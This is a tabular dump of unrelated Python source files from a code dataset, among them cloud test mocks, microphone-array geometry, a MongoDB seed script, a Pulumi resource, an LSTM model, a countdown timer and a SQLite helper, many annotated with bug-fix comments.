text string | size int64 | token_count int64 |
|---|---|---|
from faker import Faker
from datetime import datetime
fake = Faker()

# Canned values returned by mock_get_feature_property below, keyed by the
# dash-separated property names used in the tests.
min_image_age_hours = 7
max_images_per_flavor = 1
max_image_age_hours = 20
azure_storage_resourcegroup = 'openqa'
ec2_max_snapshot_age_days = 1
ec2_max_volumes_age_days = 5
class MockImage:
    """Minimal stand-in for a cloud image record.

    Only the two attributes the code under test reads are provided.
    """

    def __init__(self, name, last_modified=None):
        self.name = name
        self.last_modified = last_modified
def mock_get_feature_property(feature: str, property: str, namespace: str = None):
    """Return the canned module-level value for *property*.

    Unknown property names yield None, matching the original if/elif chain
    that simply fell through without a return.
    """
    canned_values = {
        'min-image-age-hours': min_image_age_hours,
        'max-images-per-flavor': max_images_per_flavor,
        'max-image-age-hours': max_image_age_hours,
        'azure-storage-resourcegroup': azure_storage_resourcegroup,
        'ec2-max-snapshot-age-days': ec2_max_snapshot_age_days,
        'ec2-max-volumes-age-days': ec2_max_volumes_age_days,
    }
    return canned_values.get(property)
class ec2_meta_mock:
    """Stand-in for an EC2 image's ``meta`` object; payload is a random UUID."""

    def __init__(self):
        self.data = fake.uuid4()
class ec2_image_mock:
    """Stand-in for a boto3 EC2 image resource with random identifiers."""

    def __init__(self):
        self.image_id = fake.uuid4()
        self.meta = ec2_meta_mock()
        self.name = fake.uuid4()
def ec2_tags_mock(tags=None):
    """Build an EC2-style tag list from a mapping.

    Args:
        tags: Mapping of tag keys to values. When omitted, a fresh random
            single-entry mapping is generated per call.

    Returns:
        List of ``{'Key': ..., 'Value': ...}`` dicts, one per mapping entry.

    Fix: the original used a mutable default argument built from
    ``fake.uuid4()`` — it was evaluated once at import time and shared by
    every call.
    """
    if tags is None:
        tags = {fake.uuid4(): fake.uuid4()}
    return [{'Key': key, 'Value': value} for key, value in tags.items()]
class ec2_instance_mock:
    """Randomised stand-in for a boto3 EC2 instance resource.

    Attribute names mirror the boto3 instance API; most values are random
    UUID strings since tests only compare them for equality.  ``kwargs`` are
    forwarded to ``ec2_tags_mock`` (i.e. ``tags=...``).
    """

    def __init__(self, **kwargs):
        self.state = {'Name': fake.uuid4()}
        self.instance_id = fake.uuid4()
        self.image_id = fake.uuid4()
        self.instance_lifecycle = fake.uuid4()
        self.instance_type = fake.uuid4()
        self.kernel_id = fake.uuid4()
        # launch_time is a real datetime so age arithmetic works.
        self.launch_time = datetime.now()
        self.public_ip_address = fake.uuid4()
        self.security_groups = [{'GroupName': fake.uuid4()}, {'GroupName': fake.uuid4()}]
        self.sriov_net_support = fake.uuid4()
        self.tags = ec2_tags_mock(**kwargs)
        self.state_reason = {'Message': fake.uuid4()}
        self.image = ec2_image_mock()
class azure_instance_mock:
    """Randomised stand-in for an Azure VM instance object."""

    def __init__(self):
        self.tags = fake.uuid4()
        self.name = fake.uuid4()
        self.id = fake.uuid4()
        self.type = fake.uuid4()
        self.location = fake.uuid4()
def gce_instance_mock():
    """Return a dict shaped like a GCE instance API response with random values."""
    return {
        'name': fake.uuid4(),
        'id': fake.uuid4(),
        # '/qq' suffix: presumably so callers can split these URL-style
        # fields on '/' and take the last segment — TODO confirm.
        'machineType': fake.uuid4() + '/qq',
        'zone': fake.uuid4() + '/qq',
        'status': fake.uuid4(),
        'creationTimestamp': datetime.now(),
        'metadata': fake.uuid4(),
        'tags': {'sshKeys': fake.uuid4()}
    }
| 2,560 | 873 |
"""
Helps to quickly create source and sensor positions.
Try it with the following code:
>>> import numpy as np
>>> import sms_wsj.reverb.scenario as scenario
>>> src = scenario.generate_random_source_positions(dims=2, sources=1000)
>>> src[1, :] = np.abs(src[1, :])
>>> mic = scenario.generate_sensor_positions(shape='linear', scale=0.1, number_of_sensors=6)
"""
import numpy as np
from sms_wsj.reverb.rotation import rot_x, rot_y, rot_z
def sample_from_random_box(center, edge_lengths, rng=np.random):
    """Draw a single point uniformly from an axis-aligned box.

    Args:
        center: Box center (mean of the distribution), array-like.
        edge_lengths: Edge length of the box per dimension, array-like
            broadcastable against ``center``.
        rng: Random number generator; defaults to the global ``np.random``.

    Returns:
        ``center`` plus a uniform offset within +/- half an edge length.
    """
    center = np.asarray(center)
    half_edges = np.asarray(edge_lengths) / 2
    offset = rng.uniform(low=-half_edges, high=half_edges)
    return center + offset
def generate_sensor_positions(
        shape='cube',
        center=np.zeros((3, 1), dtype=float),
        scale=0.01,
        number_of_sensors=None,
        jitter=None,
        rng=np.random,
        rotate_x=0, rotate_y=0, rotate_z=0
):
    """ Generate different sensor configurations.

    Sensors are indexed counter-clockwise starting with the 0th sensor below
    the x axis. This is done, such that the first two sensors point towards
    the x axis.

    Fix: replaced the ``np.float`` dtype alias (deprecated in NumPy 1.20,
    removed in 1.24 — previously crashed at import/call time) with the
    builtin ``float``.

    :param shape: A shape, i.e. 'cube', 'triangle', 'linear', 'circular'
        or 'chime3'.
    :param center: Numpy array with shape (3, 1)
        which holds coordinates x, y and z.
    :param scale: Scalar responsible for scale of the array. See individual
        implementations, if it is used as radius or edge length.
        Must be None for 'chime3' (fixed geometry).
    :param number_of_sensors: Sensor count; required for 'linear' and
        'circular', must be 3 for 'triangle', 6 (or None) for 'chime3'.
    :param jitter: Add random Gaussian noise with standard deviation ``jitter``
        to sensor positions.
    :param rng: Random number generator, used only when ``jitter`` is set.
    :param rotate_x: Rotation angle around the x axis.
    :param rotate_y: Rotation angle around the y axis.
    :param rotate_z: Rotation angle around the z axis.
    :return: Numpy array with shape (3, number_of_sensors).
    """
    center = np.array(center)
    if center.ndim == 1:
        center = center[:, None]

    if shape == 'cube':
        # Eight corners of a cube with edge length `scale` around the origin.
        b = scale / 2
        sensor_positions = np.array([
            [-b, -b, -b],
            [-b, -b, b],
            [-b, b, -b],
            [-b, b, b],
            [b, -b, -b],
            [b, -b, b],
            [b, b, -b],
            [b, b, b]
        ]).T
    elif shape == 'triangle':
        assert number_of_sensors == 3, (
            "triangle is only defined for 3 sensors",
            number_of_sensors)
        sensor_positions = generate_sensor_positions(
            shape='circular', scale=scale, number_of_sensors=3, rng=rng
        )
    elif shape == 'linear':
        # Equally spaced along y, then centered on the origin.
        sensor_positions = np.zeros((3, number_of_sensors), dtype=float)
        sensor_positions[1, :] = scale * np.arange(number_of_sensors)
        sensor_positions -= np.mean(sensor_positions, keepdims=True, axis=1)
    elif shape == 'circular':
        if number_of_sensors == 1:
            sensor_positions = np.zeros((3, 1), dtype=float)
        else:
            # Offset by half the angular step so the first two sensors
            # straddle the x axis symmetrically.
            radius = scale
            delta_phi = 2 * np.pi / number_of_sensors
            phi_0 = delta_phi / 2
            phi = np.arange(0, number_of_sensors) * delta_phi - phi_0
            sensor_positions = np.asarray([
                radius * np.cos(phi),
                radius * np.sin(phi),
                np.zeros(phi.shape)
            ])
    elif shape == 'chime3':
        # Fixed CHiME-3 tablet geometry; scale is not applicable.
        assert scale is None, scale
        assert (
            number_of_sensors is None or number_of_sensors == 6
        ), number_of_sensors
        sensor_positions = np.asarray(
            [
                [-0.1, 0, 0.1, -0.1, 0, 0.1],
                [0.095, 0.095, 0.095, -0.095, -0.095, -0.095],
                [0, -0.02, 0, 0, 0, 0]
            ]
        )
    else:
        raise NotImplementedError('Given shape is not implemented.')

    sensor_positions = rot_x(rotate_x) @ sensor_positions
    sensor_positions = rot_y(rotate_y) @ sensor_positions
    sensor_positions = rot_z(rotate_z) @ sensor_positions

    if jitter is not None:
        sensor_positions += rng.normal(
            0., jitter, size=sensor_positions.shape
        )

    return np.asarray(sensor_positions + center)
def generate_random_source_positions(
        center=np.zeros((3, 1)),
        sources=1,
        distance_interval=(1, 2),
        dims=2,
        minimum_angular_distance=None,
        maximum_angular_distance=None,
        rng=np.random
):
    """ Generates random positions on a hollow sphere or circle.

    Samples are drawn from a uniform distribution on a hollow sphere with
    inner and outer radius according to distance_interval.

    The idea is to sample from an angular centric Gaussian distribution.

    Fix: the original computed ``np.exp(1j * (angle[None, :], angle[:, None]))``
    — multiplying a complex scalar by a *tuple*, which raises TypeError. The
    intent is the pairwise angle difference, wrapped into (-pi, pi] via the
    complex exponential.

    Params:
        center: (3, 1) offset added to every generated position.
        sources: Number of source positions to generate.
        distance_interval: (inner, outer) radius of the hollow sphere/circle.
        dims: 2 restricts positions to the x/y plane; 3 uses the full sphere.
        minimum_angular_distance: In radians or None.
        maximum_angular_distance: In radians or None.
        rng: Random number generator, if you need to set the seed.
    Returns:
        Numpy array with shape (3, sources).
    """
    enforce_angular_constraints = (
        minimum_angular_distance is not None or
        maximum_angular_distance is not None
    )
    if dims != 2 and enforce_angular_constraints:
        raise NotImplementedError(
            'Only implemented distance constraints for 2D.'
        )

    accept = False
    while not accept:
        x = rng.normal(size=(3, sources))
        if dims == 2:
            x[2, :] = 0

        if enforce_angular_constraints:
            if sources != 2:
                raise NotImplementedError
            angle = np.arctan2(x[1, :], x[0, :])
            # Pairwise angle differences, wrapped to (-pi, pi].
            difference = np.angle(
                np.exp(1j * (angle[None, :] - angle[:, None])))
            difference = difference[np.triu_indices_from(difference, k=1)]
            distance = np.abs(difference)
            if (
                minimum_angular_distance is not None and
                minimum_angular_distance > np.min(distance)
            ):
                continue
            if (
                maximum_angular_distance is not None and
                maximum_angular_distance < np.max(distance)
            ):
                continue
        accept = True

    # Project onto the unit sphere/circle, then scale by radii drawn so the
    # points are uniform in the hollow area (dims=2) or volume (dims=3).
    x /= np.linalg.norm(x, axis=0)
    radius = rng.uniform(
        distance_interval[0] ** dims,
        distance_interval[1] ** dims,
        size=(1, sources)
    ) ** (1 / dims)
    x *= radius
    return np.asarray(x + center)
| 6,725 | 2,178 |
#!/usr/bin/env python
"""
Seed integration overlock beta atlas:
python seed.py \
--host 'cluster0-shard-00-00-skv03.mongodb.net,cluster0-shard-00-01-skv03.mongodb.net,cluster0-shard-00-02-skv03.mongodb.net' \
--username integration-rw \
--db integration \
--ssl True \
--rs Cluster0-shard-0 \
--password <password in lastpass>
"""
from subprocess import check_output
import click
def wrapout(cmds):
    """Run *cmds* as a subprocess and echo its captured stdout."""
    print(check_output(cmds).decode("utf8"))
@click.command()
@click.option("--host")
@click.option("--username")
@click.option("--password")
@click.option("--db")
@click.option("--rs")
@click.option("--datafile")
@click.option("--ssl", default=True, type=bool)
@click.option("--drop", default=False, type=bool)
@click.option("--with-host-prefix", default=False, type=bool)
@click.option("--collection")
def seed(host, username, password, with_host_prefix, rs, datafile, db, ssl, drop, collection):
    """Optionally drop a collection, then import a JSON array into MongoDB."""
    # Arguments shared by both the `mongo` drop and `mongoimport` commands.
    common_args = [
        "--port",
        "27017",
    ]
    if username and password:
        common_args += [
            "--username",
            username,
            "--password",
            password,
            "--authenticationDatabase",
            "admin",
        ]
    if ssl:
        common_args.append("--ssl")

    # The two tools address replica sets differently: the shell wants a
    # query-string parameter, mongoimport wants an "rs/host" prefix.
    if rs:
        drop_host = "{}?replicaSet={}".format(host, rs)
        import_host = "{}/{}".format(rs, host)
    else:
        import_host = drop_host = "{}".format(host)
    if with_host_prefix:
        drop_host = "mongodb://" + drop_host

    drop_cmd = (
        ["mongo", "--host", drop_host]
        + common_args
        + [
            "--eval",
            'acl_db = db.getSiblingDB("{0}"); acl_db.{1}.drop();'.format(db, collection),
        ]
    )
    seed_cmd = (
        ["mongoimport", "--host", import_host]
        + common_args
        + [
            "--collection",
            collection,
            "--db",
            db,
            "--type",
            "json",
            "--file",
            datafile,
            "--jsonArray",
        ]
    )
    if drop:
        wrapout(drop_cmd)
    wrapout(seed_cmd)


if __name__ == "__main__":
    seed()
| 2,093 | 728 |
from typing import Any
class Condition:
    """Base wrapper storing the operand value for comparison conditions."""

    def __init__(self, value: Any):
        self.value = value
class NotEQ(Condition):
    """Condition matching any value different from the wrapped one."""

    def __str__(self):
        return f"<!={self.value}>"

    def __eq__(self, other: Any):
        return self.value != other
class In(Condition):
    """Condition matching any value contained in the wrapped collection."""

    def __init__(self, *args: Any):
        super().__init__(args)

    def __str__(self):
        return f"<in {self.value}>"

    def __eq__(self, other: Any):
        return other in self.value
class NotIn(Condition):
    """Condition matching any value absent from the wrapped collection."""

    def __init__(self, *args: Any):
        super().__init__(args)

    def __str__(self):
        return f"<not in {self.value}>"

    def __eq__(self, other: Any):
        return other not in self.value
| 729 | 241 |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = ['Source']
class Source(pulumi.CustomResource):
    # NOTE: generated by the Pulumi Terraform Bridge (tfgen); structure must
    # match the generator's conventions — do not refactor by hand.
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 organization: Optional[pulumi.Input[str]] = None,
                 __props__=None,
                 __name__=None,
                 __opts__=None):
        """
        A Cloud Security Command Center's (Cloud SCC) finding source. A finding
        source is an entity or a mechanism that can produce a finding. A source is
        like a container of findings that come from the same scanner, logger,
        monitor, etc.

        To get more information about Source, see:

        * [API documentation](https://cloud.google.com/security-command-center/docs/reference/rest/v1beta1/organizations.sources)
        * How-to Guides
            * [Official Documentation](https://cloud.google.com/binary-authorization/)

        ## Example Usage

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The description of the source (max of 1024 characters).
        :param pulumi.Input[str] display_name: The source’s display name. A source’s display name must be unique
               amongst its siblings, for example, two sources with the same parent
               can't share the same display name. The display name must start and end
               with a letter or digit, may contain letters, digits, spaces, hyphens,
               and underscores, and can be no longer than 32 characters.
        :param pulumi.Input[str] organization: The organization whose Cloud Security Command Center the Source
               lives in.
        """
        # Legacy shims: __name__/__opts__ predate resource_name/opts.
        if __name__ is not None:
            warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
            resource_name = __name__
        if __opts__ is not None:
            warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
            opts = __opts__
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # Without an opts.id this is a create: validate required inputs and
        # build the property bag; with an id, __props__ must not be supplied.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = dict()
            __props__['description'] = description
            if display_name is None:
                raise TypeError("Missing required property 'display_name'")
            __props__['display_name'] = display_name
            if organization is None:
                raise TypeError("Missing required property 'organization'")
            __props__['organization'] = organization
            # Output-only property; the provider fills it in.
            __props__['name'] = None
        super(Source, __self__).__init__(
            'gcp:securitycenter/source:Source',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            description: Optional[pulumi.Input[str]] = None,
            display_name: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            organization: Optional[pulumi.Input[str]] = None) -> 'Source':
        """
        Get an existing Source resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The description of the source (max of 1024 characters).
        :param pulumi.Input[str] display_name: The source’s display name. A source’s display name must be unique
               amongst its siblings, for example, two sources with the same parent
               can't share the same display name. The display name must start and end
               with a letter or digit, may contain letters, digits, spaces, hyphens,
               and underscores, and can be no longer than 32 characters.
        :param pulumi.Input[str] name: The resource name of this source, in the format 'organizations/{{organization}}/sources/{{source}}'.
        :param pulumi.Input[str] organization: The organization whose Cloud Security Command Center the Source
               lives in.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = dict()

        __props__["description"] = description
        __props__["display_name"] = display_name
        __props__["name"] = name
        __props__["organization"] = organization
        return Source(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        The description of the source (max of 1024 characters).
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> pulumi.Output[str]:
        """
        The source’s display name. A source’s display name must be unique
        amongst its siblings, for example, two sources with the same parent
        can't share the same display name. The display name must start and end
        with a letter or digit, may contain letters, digits, spaces, hyphens,
        and underscores, and can be no longer than 32 characters.
        """
        return pulumi.get(self, "display_name")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The resource name of this source, in the format 'organizations/{{organization}}/sources/{{source}}'.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def organization(self) -> pulumi.Output[str]:
        """
        The organization whose Cloud Security Command Center the Source
        lives in.
        """
        return pulumi.get(self, "organization")

    def translate_output_property(self, prop):
        # Map provider camelCase names back to Python snake_case.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

    def translate_input_property(self, prop):
        # Map Python snake_case names to provider camelCase.
        return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 7,154 | 1,863 |
from unittest.mock import MagicMock
import pytest
from openapi_parser.builders import HeaderBuilder, SchemaFactory
from openapi_parser.enumeration import DataType
from openapi_parser.specification import Header, Integer, Schema, String
def _get_schema_factory_mock(expected_value: Schema) -> SchemaFactory:
    """Return a SchemaFactory stand-in whose create() always yields *expected_value*."""
    factory = MagicMock()
    factory.create.return_value = expected_value
    return factory
# Shared schema fixtures reused across the parametrised cases below.
string_schema = String(type=DataType.STRING)
integer_schema = Integer(type=DataType.INTEGER)

# Each entry: (raw header mapping, expected Header list, stubbed SchemaFactory).
collection_data_provider = (
    (
        {
            "X-Header": {
                "schema": {
                    "type": "string"
                }
            }
        },
        [
            Header(schema=string_schema, name="X-Header"),
        ],
        _get_schema_factory_mock(string_schema)
    ),
    (
        {
            "X-Header": {
                "description": "The number of allowed requests in the current period",
                "required": True,
                "deprecated": True,
                "schema": {
                    "type": "integer",
                },
            }
        },
        [
            Header(
                name="X-Header",
                required=True,
                description="The number of allowed requests in the current period",
                deprecated=True,
                schema=integer_schema
            )
        ],
        _get_schema_factory_mock(integer_schema)
    ),
)
@pytest.mark.parametrize(['data', 'expected', 'schema_factory'], collection_data_provider)
def test_build_collection(data: dict, expected: Header, schema_factory: SchemaFactory):
    """build_list() should turn a raw header mapping into Header objects."""
    assert expected == HeaderBuilder(schema_factory).build_list(data)
| 1,744 | 461 |
from model.msg2mail import Msg2Mail
from model.encoder import Encoder
from model.decoder import Decoder
from model.updater import RNNUpdater, AttnUpdater
from model.aggregator import MLPAggregator, AttnAggregator
| 213 | 66 |
import torch.nn as nn
class SeqForecast(nn.Module):
    """LSTM regressor that predicts the next single value of a sequence."""

    def __init__(self, input_dim, hidden_dim, num_layers=2):
        super().__init__()
        self.lstm = nn.LSTM(input_dim, hidden_dim,
                            num_layers, batch_first=True)
        self.fc = nn.Linear(hidden_dim, 1)
        # He (Kaiming) uniform init for the head weights; zero its bias.
        for param_name, param in self.fc.named_parameters():
            if 'bias' in param_name:
                nn.init.constant_(param, 0.0)
            elif 'weight' in param_name:
                nn.init.kaiming_uniform_(param)

    def forward(self, input):
        # The final hidden state of the top LSTM layer summarises the sequence.
        _, (hidden, _) = self.lstm(input)
        prediction = self.fc(hidden[-1, :, :])
        return prediction.view(-1, 1)
| 808 | 262 |
from time import sleep
def countdown(when_to_stop: int):
    """Count *when_to_stop* seconds down to zero, printing HH:MM:SS in place.

    Ctrl-C stops the countdown early (reporting the time left); any other
    error is printed and the loop keeps going.

    Fix: ``time_left`` is initialised up front — previously a
    KeyboardInterrupt raised before the first assignment made the handler
    itself crash with UnboundLocalError.
    """
    time_left = "00:00:00"
    while when_to_stop > 0:
        try:
            m, s = divmod(when_to_stop, 60)
            h, m = divmod(m, 60)
            time_left = f"{h:02d}:{m:02d}:{s:02d}"
            print(time_left, end="\r")
            sleep(1)
            when_to_stop -= 1
        except KeyboardInterrupt:
            print(f"KeyboardInterrupt at {time_left}")
            break
        except Exception as e:
            print("Exception: ", e)
    print()
def countdown_cui():
    """Interactive loop: read a number of seconds and run the countdown.

    Entering 'q' (or Ctrl-C) terminates; non-numeric input re-prompts.

    Fix: the bare ``except:`` around the int conversion is narrowed to
    ``ValueError`` so unrelated errors are no longer swallowed as
    "Not a number!". (Also strips dataset-artifact text that had been fused
    onto the final line.)
    """
    print("Enter 'q' or type Ctrl-c to terminate.")
    while True:
        inp_s = input("Specify a number in seconds >> ")
        if inp_s == "q":
            break
        try:
            when_to_stop = int(inp_s)
        except KeyboardInterrupt:
            print("KeyboardInterrupt")
            break
        except ValueError:
            print("Not a number!")
            continue
        countdown(when_to_stop)


if __name__ == "__main__":
    countdown_cui()
import os
import constant
def human_size(number):
    """Format a byte count using the unit table from ``constant``.

    Args:
        number: Raw size (numeric); converted to float before scaling.

    Returns:
        String like ``'1.5 MB'`` (rounded to ``constant.size_round`` digits).

    Fix: the original could increment the unit index to ``len(size_unit)``
    (one final division after reaching the last unit) and then crash with
    IndexError on very large inputs. The loop now stops at the last unit,
    leaving the value expressed in the largest available unit instead.
    """
    unit_idx = 0
    result = float(number)
    last_unit = len(constant.size_unit) - 1
    while result > constant.size_diff and unit_idx < last_unit:
        result = result / constant.size_diff
        unit_idx += 1
    return '{} {}'.format(round(result, constant.size_round), constant.size_unit[unit_idx])
def classify_path(path, split_max, current_split=0):
    """Yield every ordered combination of ``split_max`` components of *path*.

    Components are taken in their original order (like itertools.combinations
    over the path segments), each yielded as a list of strings.
    """
    if current_split == split_max:
        yield []
        return
    parts = path.split(os.path.sep)
    # Leave enough trailing components for the remaining recursion levels.
    limit = len(parts) - split_max + current_split + 1
    for start in range(limit):
        remainder = os.path.sep.join(parts[start + 1:])
        for tail in classify_path(remainder,
                                  current_split=current_split + 1,
                                  split_max=split_max):
            yield [parts[start]] + tail
def classify_possible_path(path):
    """Yield every ordered sub-path of *path*, joined by the OS separator.

    Produces all component combinations of every size from 1 up to the full
    component count.
    """
    component_count = len(path.split(os.path.sep))
    for size in range(1, component_count + 1):
        for combination in classify_path(path=path, split_max=size):
            yield os.path.sep.join(combination)
def make_dictionary_by_classification(iterable, ignore_list=None):
    """Aggregate children under every sub-path classification of their paths.

    For each child's ``part_path``, every possible sub-path key (except those
    in *ignore_list*) accumulates the child's ``total_size`` and collects the
    child itself.
    """
    result = {}
    for child in iterable:
        for sort_key in classify_possible_path(child.part_path):
            if ignore_list and sort_key in ignore_list:
                continue
            bucket = result.setdefault(sort_key, {})
            bucket[constant.sort_size_name] = (
                bucket.get(constant.sort_size_name, 0) + child.total_size
            )
            bucket.setdefault(constant.sort_children_name, []).append(child)
    return result
def sorted_dictionary(dictionary, max_key=10):
    """Return dict items ordered by aggregated size, largest first.

    A falsy *max_key* returns all items; otherwise only the top *max_key*.
    """
    ordered = sorted(
        dictionary.items(),
        key=lambda item: item[1][constant.sort_size_name],
        reverse=True,
    )
    return ordered[:max_key] if max_key else ordered
| 2,146 | 650 |
from Module.SocketServer_Client import SocketServer_Client

# Module-level client connected to the local socket server.
# Fix: removed dataset-artifact text ("| 108 | 31 |") that had been fused
# onto this line and made it a syntax error.
Client = SocketServer_Client("localhost", 5555)
# from django.conf.urls import include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
# admin.autodiscover()
import django.contrib.auth.views as auth_views
import django.contrib.admindocs.urls as admindocs_urls
from django.urls import path, include
app_name = "fvserver"

# Root URLconf: auth views (login/logout/password change), the server app,
# the admin docs, and the admin site. Commented examples retained from the
# original project template.
urlpatterns = [
    # Examples:
    # url(r'^macnamer/', include('macnamer.foo.urls')),
    path("login/", auth_views.LoginView.as_view(), name="login"),
    path("logout/", auth_views.logout_then_login, name="logout"),
    path(
        "changepassword/",
        auth_views.PasswordChangeView.as_view(),
        name="password_change",
    ),
    path(
        "changepassword/done/",
        auth_views.PasswordChangeDoneView.as_view(),
        name="password_change_done",
    ),
    path("", include("server.urls")),
    # Uncomment the admin/doc line below to enable admin documentation:
    path("admin/doc/", include(admindocs_urls)),
    # Uncomment the next line to enable the admin:
    path("admin/", admin.site.urls),
    # url(r'^$', 'namer.views.index', name='home'),
]
| 1,103 | 349 |
import sqlite3
class SQLiteHelper(object):
    """Thin convenience wrapper over sqlite3 with an implicit 'id' primary key.

    ``create_table`` must be called first — it opens the connection used by
    the other methods. Table and column names are still interpolated into the
    SQL (sqlite cannot parameterize identifiers), so they must come from
    trusted code; row VALUES are now bound as parameters.

    Fix: the original built INSERT/SELECT values by string concatenation,
    which broke on any value containing a quote and was SQL-injectable.
    """

    def __init__(self, db_name):
        # Database file will be '<db_name>.db'; connection opens lazily in
        # create_table (preserving the original lifecycle).
        self.db_name = db_name

    def create_table(self, table_name, columns):
        """Open the connection and create *table_name* with an id PK plus *columns* (name -> SQL type)."""
        self.conn = sqlite3.connect(str(self.db_name) + '.db')
        self.c = self.conn.cursor()
        column_defs = ['id INTEGER PRIMARY KEY']
        column_defs += ['{} {}'.format(name, sql_type) for name, sql_type in columns.items()]
        self.c.execute('CREATE TABLE IF NOT EXISTS {} ({})'.format(
            table_name, ','.join(column_defs)))
        self.conn.commit()

    def selectAll(self, table_name):
        """Return every row of *table_name* as a list of tuples."""
        return self.c.execute("SELECT * FROM " + table_name).fetchall()

    def getColumns(self, table_name):
        """Return the column names of *table_name* in declaration order."""
        cursor = self.c.execute('select * from ' + table_name)
        return [description[0] for description in cursor.description]

    def selectWhereId(self, table_name, id):
        """Return the row with primary key *id* as a column-name -> value dict."""
        cursor = self.c.execute(
            'SELECT * FROM {} where id=?'.format(table_name), (id,))
        row = cursor.fetchone()
        return dict(zip(self.getColumns(table_name), row))

    def insert(self, table_name, values):
        """Insert a row; *values* maps column name -> value (stored via str())."""
        keys = list(values)
        column_list = ','.join(['id'] + keys)
        placeholder_list = ','.join(['NULL'] + ['?'] * len(keys))
        # Values bound as parameters; str() kept to match original storage.
        self.c.execute(
            'INSERT INTO {} ({}) VALUES ({})'.format(
                table_name, column_list, placeholder_list),
            [str(values[key]) for key in keys])
        self.conn.commit()
import activitylogs
from events.registry import build_job
# Register activity-log subscriptions for every build-job lifecycle event.
# NOTE(review): "BuildJobSoppedTriggeredEvent" looks like a typo for
# "Stopped", but the attribute must match events.registry.build_job —
# confirm upstream before renaming.
activitylogs.subscribe(build_job.BuildJobStartedTriggeredEvent)
activitylogs.subscribe(build_job.BuildJobSoppedTriggeredEvent)
activitylogs.subscribe(build_job.BuildJobDeletedTriggeredEvent)
activitylogs.subscribe(build_job.BuildJobCreatedEvent)
activitylogs.subscribe(build_job.BuildJobUpdatedEvent)
activitylogs.subscribe(build_job.BuildJobViewedEvent)
activitylogs.subscribe(build_job.BuildJobArchivedEvent)
activitylogs.subscribe(build_job.BuildJobRestoredEvent)
activitylogs.subscribe(build_job.BuildJobBookmarkedEvent)
activitylogs.subscribe(build_job.BuildJobUnBookmarkedEvent)
activitylogs.subscribe(build_job.BuildJobLogsViewedEvent)
activitylogs.subscribe(build_job.BuildJobStatusesViewedEvent)
| 765 | 220 |
"""
Copyright (c) 2018 Sébastien Eustace
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from .style import Style
class StyleStack(object):
    """LIFO stack of output styles.

    When the stack is empty, ``pop``/``get_current`` fall back to
    ``empty_style``. ``pop(style)`` unwinds the stack down to (and including)
    the most recent entry equal to *style*.
    """

    def __init__(self, empty_style=None):
        # Fallback style used whenever the stack is empty.
        self.empty_style = empty_style or Style()
        self.reset()

    def reset(self):
        """Discard all stacked styles."""
        self.styles = []

    def push(self, style):
        """Make *style* the current style."""
        self.styles.append(style)

    def pop(self, style=None):
        """Pop the top style, or unwind to a specific *style*.

        Raises ValueError when *style* is given but not on the stack.
        """
        if not self.styles:
            return self.empty_style
        if not style:
            return self.styles.pop()
        # Search from the top of the stack for a matching entry.
        for depth, candidate in enumerate(reversed(self.styles)):
            if style == candidate:
                del self.styles[len(self.styles) - 1 - depth:]
                return candidate
        raise ValueError("Incorrectly nested style tag found.")

    def get_current(self):
        """Return the style on top of the stack (or the empty style)."""
        return self.styles[-1] if self.styles else self.empty_style
| 1,918 | 595 |
"""histo_GUI.py: Written by Billy Rathje, OHSU, 2014.
Also Phil Wilmarth, OHSU.
Library of support functions and classes for PAW pipeline programs.
The MIT License (MIT)
Copyright (c) 2017 Phillip A. Wilmarth and OHSU
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
